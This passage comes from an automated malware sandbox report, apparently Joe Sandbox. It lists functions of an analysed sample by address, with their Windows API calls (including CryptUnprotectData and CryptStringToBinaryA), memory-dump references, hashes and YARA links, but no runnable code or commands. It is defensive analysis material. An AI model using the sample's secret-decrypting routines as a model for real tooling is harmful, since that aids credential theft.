                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: X@QK$[}t$^.[$t*D@
                      • API String ID: 0-966779423
                      • Opcode ID: dac6a0f7d806658d9316682c7dbeb781424f9e21dc9c1c9e171b4e871c3ff4dd
                      • Instruction ID: 3a60c492c36965c0052db4016a45ac33ef88af44684d1b3ad6bcffb9fb4098b2
                      • Opcode Fuzzy Hash: dac6a0f7d806658d9316682c7dbeb781424f9e21dc9c1c9e171b4e871c3ff4dd
                      • Instruction Fuzzy Hash: 23B2F6B3A0C204AFD304AE29EC8567AF7E9EF94720F16893DEAC4C3744E63558458797
                      Function 001D8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptBinaryToStringA.CRYPT32(00000000,001C5184,40000001,00000000,00000000,?,001C5184), ref: 001D8EC0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptString
                      • String ID:
                      • API String ID: 80407269-0
                      • Opcode ID: f68e6ad85df6e7ab84f02d33e92a4e7da576ebd8cc43bda30972d881d75a09fa
                      • Instruction ID: a7cf12613b4c50359fef73a6be71865e661c71ca11e12f8b6fcc98fa87c65483
                      • Opcode Fuzzy Hash: f68e6ad85df6e7ab84f02d33e92a4e7da576ebd8cc43bda30972d881d75a09fa
                      • Instruction Fuzzy Hash: E8111575200209BFDB04DF64E884FAB33AAAF89304F109559F919CB350DB35EC51DB64
                      Function 001C9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                      Download Yara Rule
                      APIs
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9AEF
                      • LocalAlloc.KERNEL32(00000040,?,?,?,001C4EEE,00000000,?), ref: 001C9B01
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9B2A
                      • LocalFree.KERNEL32(?,?,?,?,001C4EEE,00000000,?), ref: 001C9B3F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptLocalString$AllocFree
                      • String ID:
                      • API String ID: 4291131564-0
                      • Opcode ID: 918366f13810bf1bed43cc75e78be7e4f7a4b6129e403016e904d89bce82778a
                      • Instruction ID: 607cd64af8a8b2a36ecf048b1535d01c43af8dfae916c054589213be2bd32b18
                      • Opcode Fuzzy Hash: 918366f13810bf1bed43cc75e78be7e4f7a4b6129e403016e904d89bce82778a
                      • Instruction Fuzzy Hash: D211A2B5240308BFEB10CF64DD95FAA77B5FB89704F208058F915AB390C7B6A911CB94
                      Function 001D7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00E3E4F0,00000000,?,001E0E10,00000000,?,00000000,00000000), ref: 001D7A63
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D7A6A
                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00E3E4F0,00000000,?,001E0E10,00000000,?,00000000,00000000,?), ref: 001D7A7D
                      • wsprintfA.USER32 ref: 001D7AB7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                      • String ID:
                      • API String ID: 3317088062-0
                      • Opcode ID: dcfb6508bcaae969f24a71aeee81b4c35530fe27dce560483f899ddd592f6027
                      • Instruction ID: 0b40b9285c37234a04c1b47a21be190a19856535432bc3ba53c8acc7f1b36941
                      • Opcode Fuzzy Hash: dcfb6508bcaae969f24a71aeee81b4c35530fe27dce560483f899ddd592f6027
                      • Instruction Fuzzy Hash: 36118EB1A45218EBEB20DB54DD49FA9B778FB04721F1047AAE90AA32C0D7741A40CF51
                      Function 0059B001 Relevance: 5.5, Strings: 3, Instructions: 1733COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: {Li$}]v[$~)w
                      • API String ID: 0-4223912085
                      • Opcode ID: b6d89732e3f7c9add614097aaec272f34e8be778ab39d581a007c5ccd2a29266
                      • Instruction ID: 7559ffc2f97875f227ab61d4b70b33059d9bdcad281b51ad0e54ab5a11a58d30
                      • Opcode Fuzzy Hash: b6d89732e3f7c9add614097aaec272f34e8be778ab39d581a007c5ccd2a29266
                      • Instruction Fuzzy Hash: FCB23BF360C2049FE304AE2DEC8567ABBE9EFD4720F16853DE6C4C7744EA3598058696
                      Function 001D3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                      Download Yara Rule
                      APIs
                      • CoCreateInstance.COMBASE(001DE118,00000000,00000001,001DE108,00000000), ref: 001D3758
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 001D37B0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharCreateInstanceMultiWide
                      • String ID:
                      • API String ID: 123533781-0
                      • Opcode ID: 747a0b9ec02127b3c0747d24b522813899864f981a879e55ee25e355fb44e5aa
                      • Instruction ID: 7f97fe5ee46e4443883450800fb95f9294fe1078f2ebc27362e32e31d16150b9
                      • Opcode Fuzzy Hash: 747a0b9ec02127b3c0747d24b522813899864f981a879e55ee25e355fb44e5aa
                      • Instruction Fuzzy Hash: 7941FB70A00A189FDB24DB58CC95B9BB7B4BB48702F4042D9E618E72D0D771AE85CF51
                      Function 001C9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 001C9B84
                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 001C9BA3
                      • LocalFree.KERNEL32(?), ref: 001C9BD3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$AllocCryptDataFreeUnprotect
                      • String ID:
                      • API String ID: 2068576380-0
                      • Opcode ID: d541cc53fbc913b23ec7c5b600dcc22c500b89a4c050687fe4d11e38c137e78e
                      • Instruction ID: 9ec1b2037cb97feb5beea0213e82aa6f5ed899e2bd51c0feea6ec328e2417b02
                      • Opcode Fuzzy Hash: d541cc53fbc913b23ec7c5b600dcc22c500b89a4c050687fe4d11e38c137e78e
                      • Instruction Fuzzy Hash: 0B11CCB4A00209EFDB04DF94D985EAE77B5FF88300F108568E915A7350D774AE11CF61
                      Function 005A030D Relevance: 2.9, Strings: 1, Instructions: 1619COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 3f/
                      • API String ID: 0-2500111303
                      • Opcode ID: 48b18bd18067cf34d03fc7ac41ad6e913d3a33fa5072cdeac8eb0463e3b150d9
                      • Instruction ID: f771c1cded03229ab9a6f91638ebc37596e4beb2dfff4d149dd0632c21ccdc06
                      • Opcode Fuzzy Hash: 48b18bd18067cf34d03fc7ac41ad6e913d3a33fa5072cdeac8eb0463e3b150d9
                      • Instruction Fuzzy Hash: F8B206F390C2049FE3047E29EC8567ABBE5EF94320F1A4A3DEAC5C3744EA7558058697
                      Function 00579ADD Relevance: 2.7, Strings: 2, Instructions: 236COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: rHmm$sG|
                      • API String ID: 0-3568970663
                      • Opcode ID: 5d90d7bf7bd4d3900fb6f18f5e3e58cd8d2c6c3e66fa9424d29eecc9d418d466
                      • Instruction ID: 2570a330a3fb28b7058d5224f794e1dd626bb33535e663ac13dd5dd5abaee3c4
                      • Opcode Fuzzy Hash: 5d90d7bf7bd4d3900fb6f18f5e3e58cd8d2c6c3e66fa9424d29eecc9d418d466
                      • Instruction Fuzzy Hash: 00617BF3E1C3105BE3045E2DDC8576AB6DADFD4360F2A863DEAC4D7744E9B998018286
                      Function 0051DD62 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: ?%T4$er$^
                      • API String ID: 0-4237381662
                      • Opcode ID: 501f3a541cd89df32687981eb16a407d1efcfdc37db10e767019cba9a866c44f
                      • Instruction ID: 7f68f94df2a1b73e7995476d397674191f7e689c3ade2793b06e7067420f69ce
                      • Opcode Fuzzy Hash: 501f3a541cd89df32687981eb16a407d1efcfdc37db10e767019cba9a866c44f
                      • Instruction Fuzzy Hash: 1951F7F3A082005BF308AE29DC5577AB7D6DB94320F1A453DDBC5D7384E9799C058792
                      Function 00591AB9 Relevance: 1.9, Strings: 1, Instructions: 656COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 2u/
                      • API String ID: 0-1944481109
                      • Opcode ID: d990ebf45fe72660ade446600d9c69cd5a474af4146b20511d2261fc9432f3a2
                      • Instruction ID: 233629c5c9a35c763aaeb731fdbb531db6be24db52377e8acf07d7fb5f42c034
                      • Opcode Fuzzy Hash: d990ebf45fe72660ade446600d9c69cd5a474af4146b20511d2261fc9432f3a2
                      • Instruction Fuzzy Hash: 831218F360C6009FD7046E2DEC8566AFBE9EFD4320F1A893DE6C4C3754E63598418692
                      Function 004FA366 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: ?|{=
                      • API String ID: 0-1078217459
                      • Opcode ID: d3bd841463310755375d587e80c9ab879044c44f8dda2e5418ae0895d0f9156b
                      • Instruction ID: 2a0107a57ecb66a09774d0c5ec38e4184727fae570934b7cffa904edaefaf23a
                      • Opcode Fuzzy Hash: d3bd841463310755375d587e80c9ab879044c44f8dda2e5418ae0895d0f9156b
                      • Instruction Fuzzy Hash: 9E6104B3E082105FE3145E2DEC8572ABBD6EBD4720F1B493DEAC497344D9795C418692
                      Function 0050F8C0 Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
